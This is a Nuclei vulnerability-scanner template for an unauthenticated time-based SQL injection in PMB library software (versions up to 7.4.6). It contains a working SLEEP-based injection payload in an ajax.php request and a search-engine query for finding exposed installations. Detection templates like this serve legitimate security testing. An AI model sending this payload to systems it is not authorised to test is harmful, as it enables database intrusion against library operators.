nuclei-templates/http/vulnerabilities/other/pmb-sqli.yaml

35 lines
1.2 KiB
YAML

id: pmb-sqli
info:
name: PMB <= 7.4.6 - SQL Injection
author: r3Y3r53
severity: high
description: |
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs.
reference:
- https://www.exploit-db.com/exploits/51197
- https://vulners.com/exploitdb/EDB-ID:51197
metadata:
verified: true
max-request: 1
google-query: inurl:"opac_css"
tags: sqli,unauth,pmb
http:
- raw:
- |
@timeout: 15s
GET /pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined HTTP/2
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type, "text/html")'
- 'contains(header, "PmbOpac")'
- 'duration>=5'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450221008299918384df65ef135c2cf642f0f8193985806ecaa0a4e6ef25307e1103927202203973bf9b8474ba3a26e0ece1efb52cde0a21019803714901e3bc621be187b0ca:922c64590222798bb761d5b6d8e72950